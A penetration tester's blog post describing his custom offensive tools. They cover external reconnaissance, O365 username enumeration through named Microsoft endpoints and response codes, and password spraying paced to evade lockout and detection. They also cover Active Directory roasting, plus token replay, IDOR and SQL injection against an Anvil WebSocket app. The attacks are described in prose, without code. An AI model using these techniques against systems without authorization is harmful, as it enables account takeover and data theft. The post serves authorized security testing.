Heads Down in the Trenches: Tool Development and End-of-Year Offensive Work

Keith Pachulski
Dec 20, 2025
11 min read

It's been a few weeks since my last post. I've been busy. The end of the year always seems to get us. Organizations are scrambling to close out projects that have been lingering for months, budgets are coming to a close, and with that comes an influx of high-priority, short-notice work. Sleep becomes optional.

Most of my time has been spent on offensive technical work: external / internal penetration tests and public-facing web application testing. With that comes tool development, or redevelopment in some cases. Some tools we build are case-specific and can't really be shared without spending significant time sanitizing them. Others, though, make it into the toolkit.

The Tools

For the tools that can be shared, they're included in my VA-PT Toolkit on GitHub. Here's what's been added or updated recently:

quick_recon.py

This one is still heavily under development, but it's already saving me significant time. The core problem was, I had a collection of individual tools and manual processes I was running on every external engagement. LinkedIn enumeration with one script. Bucket discovery with another. DNS brute forcing followed by manual wildcard detection. GitHub secret scanning. All separate. All time-consuming to run individually and correlate results.

So I started consolidating.

LinkedIn Enumeration: Most of the common LinkedIn scraping tools have stopped working correctly, either LinkedIn changed their anti-automation measures or the tools just weren't maintained. The ones that did work didn't provide the depth I needed. Employee names are useful, but I also want titles, reporting structure, department mapping, and tenure data. That information shapes social engineering campaigns and helps identify high-value targets for spear phishing. I built my own module that handles authentication via session cookies and extracts the full employee dataset with organizational context.

Cloud Storage Enumeration: Manually checking for exposed S3 buckets, Azure Blob containers, and GCP storage gets tedious fast. The tool generates naming permutations based on the target domain -- company name, abbreviations, common patterns like {company}-dev, {company}-backup, {company}-prod. It then checks for public access. When it finds something open, it categorizes files by sensitivity: environment configs, database dumps, and credentials get flagged as high-interest; documentation and source code as medium; everything else gets logged but not prioritized. Automatic download with size limits so you're not pulling down 50GB of useless data.

DNS Enumeration with Certificate Transparency: Here's where it gets interesting. DNS brute forcing alone isn't enough. You're limited to whatever wordlist you're using, and you're going to miss subdomains with unusual names. That's where crt.sh comes in.

crt.sh is a certificate transparency log search engine. When a certificate authority issues an SSL certificate, that issuance gets logged to public Certificate Transparency logs, a requirement since 2018 for certificates to be trusted by major browsers. These logs are searchable, which means if a company has ever issued a certificate for internal-admin-portal.company.com, that subdomain is now public knowledge even if it doesn't resolve in DNS brute forcing.

The tool queries crt.sh for all certificates issued to the target domain, extracts every subdomain from the certificate SANs (Subject Alternative Names), and cross-references this against DNS brute force results. Wildcards get detected and filtered, if *.company.com resolves to the same IP regardless of what you put in front of it, you know it's a wildcard and can discard those false positives. The result is a validated list of actual subdomains from both passive and active enumeration.

GitHub Secret Scanning: Developers commit credentials. It happens constantly. API keys, database passwords, AWS access keys, internal URLs, I've found all of it in client repositories. The module searches for the target organization's public repos and scans commit history for secrets using pattern matching. High-entropy strings, known credential formats, environment variable patterns. Results get categorized by confidence level and potential impact.

The Integration: All of this runs in phases. Scope validation first, then DNS and technology fingerprinting, then OSINT collection, then cloud enumeration. Results feed into a consolidated report with JSON output for further processing. Skip flags let you disable modules you don't need. The goal is one command that handles the first two hours of external reconnaissance automatically.

o365_recon_spray.py

A lot of the classic O365 enumeration and spraying tools have stopped working—

developed in Python 2, no longer maintained, or Microsoft has patched the specific endpoint they were targeting. So I threw together a modern version.

Username Enumeration: The tool uses three different Microsoft endpoints, each with different response characteristics.

The GetCredentialType API at login.microsoftonline.com/common/GetCredentialType is the most reliable. Send a POST with a username, and the IfExistsResult field tells you if the account exists: 0 means valid, 1 means invalid, 5 or 6 indicate valid with additional states. It also returns federation information if the domain uses ADFS or third-party identity providers. The catch is aggressive rate limiting, hit it too hard and you'll get throttled.

ActiveSync at outlook.office365.com/Microsoft-Server-ActiveSync is the fallback. Send an OPTIONS request with basic auth credentials (any password). A 401 response means the user exists but the password is wrong. A 404 means the user doesn't exist. Less rate limiting, but also less reliable for some tenant configurations.

OneDrive URL probing transforms the domain, replacing dots with underscores, to construct the SharePoint personal URL format. For company.com and user jsmith, it builds company_com-my.sharepoint.com/personal/jsmith_company_com/ and checks if it exists. A 302, 401, or 403 indicates a valid user with a OneDrive provisioned. Useful for confirming accounts but requires OneDrive to be enabled.

The tool tries GetCredentialType first, automatically falls back to ActiveSync when rate limited, and can use OneDrive for validation. All three methods get logged separately so you can see which technique confirmed each account.

Password Policy Analysis: Before spraying, you need to understand lockout thresholds. The tool probes for smart lockout configuration, estimates lockout duration based on response timing, and checks for MFA enforcement indicators. This informs spray timing, if lockout is 10 attempts per 30 minutes, you spray one password across your entire user list, wait 31 minutes, then spray the next password.

The Spray: Configurable delays between users (randomized within a range to avoid pattern detection) and between password rounds. State gets saved to disk, so if you interrupt the spray or lose your connection, you can resume from where you left off. Valid credentials get logged immediately with the endpoint that confirmed them.

I'll likely merge this into quick_recon at some point as an optional module. For now it's standalone.

windows_enum.py and ad_enum.py

Purpose-built for a specific scenario: very large internal network, not many Windows machines immediately visible, but the ones I could see were domain-joined. I needed to find Domain Controllers fast across a massive IP range while a parallel nmap handled the broader enumeration scanning in the background.

windows_enum.py handles initial Windows system discovery. The port signature for Windows identification is specific: 135 (RPC Endpoint Mapper), 139 (NetBIOS Session Service), 445 (SMB), 3389 (RDP). The tool scans for these ports with configurable threading.

Once Windows systems are identified, enumeration begins. Impacket's lookupsid.py handles RID cycling, starting from RID 500 (Administrator) and walking through the range to enumerate users and groups. samrdump.py pulls SAM database information when accessible. rpcdump.py enumerates RPC endpoints. smbclient.py handles share enumeration and file listing. All of this works with null sessions when available or falls back to authenticated enumeration if you have credentials.

Results get consolidated per-system: computer name, domain membership, domain SID, enumerated users, groups, shares, RPC endpoints, and active sessions. Everything dumps to both JSON and human-readable reports.

ad_enum.py is the Domain Controller-specific variant. Rapid DC discovery across large IP ranges with subnet exclusion support, useful when you have a /16 to scan but need to skip certain ranges. Once DCs are identified, it focuses on AD-specific enumeration: GetADUsers.py for user extraction via LDAP, GetNPUsers.py for AS-REP roasting (accounts with "Do not require Kerberos preauthentication" enabled), and GetUserSPNs.py for Kerberoastable accounts.

The AS-REP roasting workflow is automated: enumerate users, write them to a file, run GetNPUsers against the DC, output hashes in hashcat format. Same with share enumeration and access testing. User lists are formatted for direct use in subsequent attacks, password spraying, Kerberoasting, whatever comes next.

Both tools prioritize speed over stealth. These aren't for slow-and-low operations; they're for when you need answers fast on an internal engagement with limited time.

The Anvil WebSocket Attack Framework

One interesting tool that was developed was for attacking an Anvil application via WebSockets. The target was using Anvil's capability token system for authorization, a cryptographic approach where each database row access requires a specific token with a MAC binding the token to that row. I needed a way to intercept, analyze, and exploit this traffic systematically.

Database Structure Enumeration: Here's what made this attack particularly effective. After authenticating to the application, the Anvil server sent down a vt_global structure containing the database schema—table IDs, column names, data types, and relationships.

The server essentially hands you a map of the entire backend data model.

Table 2931 is Auth Users (email, password_hash, enabled, confirmed_email). Table 2935 is User Profiles (name, email, role_links, tenant_link, organization_link). Table 2956 is Roles (name, is_admin, permissions). The schema shows exactly which columns contain sensitive data and how tables relate to each other through foreign keys. No guessing, no fuzzing—the application tells you precisely what to target and how the data connects.

This meant I could build queries targeting exactly the right table IDs and column names from the start. When enumerating users, I knew to request columns ["email", "password_hash", "enabled"] from table 2931. When following link traversal, I knew that User Profiles link to Auth Users through specific foreign key columns. The schema-first approach eliminated trial and error entirely.

Capability Token Mechanics: Anvil's tokens contain a scope (defining which table and row they authorize), a MAC (cryptographic signature binding the token to that scope), and narrow constraints. The MAC should prevent tampering—you can't just change the row_id and access other records. But the tokens flow through WebSocket messages, which means they're interceptable and replayable.

The tool hooks into OWASP ZAP's WebSocket API to capture all traffic between browser and server. Every capability token that passes through gets extracted, categorized by table type (users, roles, permissions, organizations, etc.), and stored with its associated channel ID. The capture happens passively while you browse the application normally—just building up a collection of valid tokens for later exploitation.

IDOR and Privilege Testing: Once tokens are captured, the tool tests whether the MAC is actually validated per-row or just per-table. It takes a valid token for row N, modifies the scope to row N+1 while keeping the same MAC, and sends the request. If it succeeds, the application is vulnerable to IDOR—the MAC isn't properly binding to the row_id. It also tests write and delete operations against captured tokens to determine permission boundaries.

Link Traversal Exploitation: Anvil tables have foreign key relationships—a User Profile might link to an Auth User record which contains the password hash. The tool automatically follows these relationships: fetch a User Profile, extract any linked capability tokens from the response, use those to access the linked records, repeat. This chains through the data model, capturing tokens for records you'd never see through normal application use. On one engagement this turned a handful of captured User Profile tokens into complete access to Auth Users, Roles, Permissions, and Organizations tables.

SQL Injection Suite: Why not just use sqlmap, you are likely asking? Because sqlmap doesn't speak Anvil's WebSocket protocol. The injection points aren't in HTTP parameters—they're buried in JSON command structures flowing over WebSocket connections through ZAP. Sqlmap would need a custom tamper script to construct valid Anvil messages, hook into ZAP's WebSocket API, handle the async request/response matching, and parse capability tokens out of responses. At that point you're writing more glue code than just building the tool from scratch.

So the SQLi module is purpose-built for this environment. Error-based testing with 30+ payloads looking for database error signatures in responses. Boolean-based with true/false payload pairs measuring response length differences. Time-based with pg_sleep, SLEEP, and WAITFOR DELAY payloads, comparing response times against baseline. Union-based with automatic column count detection. Stacked queries for databases that support them. All of this runs in parallel with threading, automatically identifying injection points in the WebSocket command structure—args arrays, kwargs dictionaries, column name fields, anywhere user-controlled data touches the backend.

When SQLi is confirmed, the tool spawns an interactive shell. Built-in commands for database enumeration (!tables, !columns, !dump), hash extraction (!hashes tries Anvil's table 2931 plus common table names plus PostgreSQL system tables), privilege checking (!privs), and file reading (!file). Raw payloads get sent directly for manual exploitation.

Password Hash Extraction: The tool automatically scans all incoming WebSocket traffic for bcrypt hash patterns ($2a$, $2b$, $2y$). When found, they're logged with associated email addresses when available, categorized by source, and saved for offline cracking. Between link traversal pulling Auth User records and SQLi extracting directly from the database, I walked away from this engagement with a significant number of password hashes.

The second component focuses specifically on the login endpoint (anvil.private.users.login_with_email) for authentication bypass testing and user enumeration. Same SQLi methodology, plus timing-based and error-based user enumeration, plus brute force with configurable threading.

Because this tool was built specifically for a client's deployment environment—with hardcoded table structures, endpoint configurations, and attack chains tailored to their implementation—this one stays in the vault. Too much sanitization work to make it generic, and frankly the value was in the approach, not the code itself. The methodology translates: intercept the schema, map the relationships, follow the tokens, extract the data.

On AI-Assisted Development

A quick note on how these tools get built: agentic AI has fundamentally changed my development workflow. Whether I'm writing offensive tooling or building out defensive automation, AI-assisted development, some people call it "vibe coding", has become a force multiplier I can't ignore.

I'm not talking about asking ChatGPT to explain a Python function. I'm talking about using AI agents to scaffold entire modules, debug edge cases in real-time, refactor code while I focus on the attack logic, and iterate through implementations faster than I ever could manually. The Anvil framework, the O365 sprayer, the recon automation—all of these came together significantly faster because I wasn't grinding through boilerplate alone.

Anyone in this industry who hasn't fully embraced agentic AI is either lying about their workflow or so far behind the curve they're making themselves ineffective to their employers and clients. The attackers are using these tools. If you're on defense, or offense, and you're not -- you're already at a disadvantage.

The "Penetration Test" Problem

I've reviewed a lot of third-party "penetration test" reports over the past few months. The majority of them were complete garbage. It was glaringly obvious no actual work was done—just output generated from Burp, ZAP, and Nessus with some minor wording and formatting changes. Different logo, same scanner output. That's not a penetration test. That's a vulnerability scan with a markup.

I need to say this plainly: if your security vendor runs Nessus, reformats the output into a branded template, and hands you a "penetration test report," you've been scammed.

The firms doing this, and there are a lot of them, are actively making the security industry worse. They're undercutting legitimate testers on price because their actual deliverable requires almost no skill. They're setting client expectations incorrectly about what a penetration test should look like. And they're leaving organizations with a false sense of security that will evaporate the moment an actual attacker shows up.

Real adversaries don't run a single scanner and call it a day. They chain findings. They pivot. They develop custom tooling when off-the-shelf doesn't work. They understand business context and go after what actually matters. They persist for days or weeks, not hours.

The reports I've seen are filled with findings like "SSL Certificate Expiry" and "Missing HTTP Security Headers" and "Server Version Disclosure"—all valid findings, but none of them are what's going to get you compromised. Meanwhile the actual critical issues—the password reuse across service accounts, the misconfigured trust relationships, the exposed internal applications, the cloud storage with customer PII—go completely unnoticed because nobody actually looked. They ran the scan, exported the PDF, and moved on to the next client.

If your "penetration test" didn't include manual testing, if nobody tried to chain vulnerabilities together, if there's no evidence of actual exploitation attempts in the report—you didn't get a penetration test. You got an expensive vulnerability scan and a company that's hoping you don't know the difference.

Need Actual Testing?

If you're reading this and realizing your current security testing isn't what you thought it was, or if you're looking for offensive testing that actually simulates how real attackers operate, let's talk.

We test the way attackers attack. That's the only way to find what actually matters before someone else does.

Keith Pachulski

Red Cell Security, LLC

keith@redcellsecurity.org

www.redcellsecurity.org

Book a consultation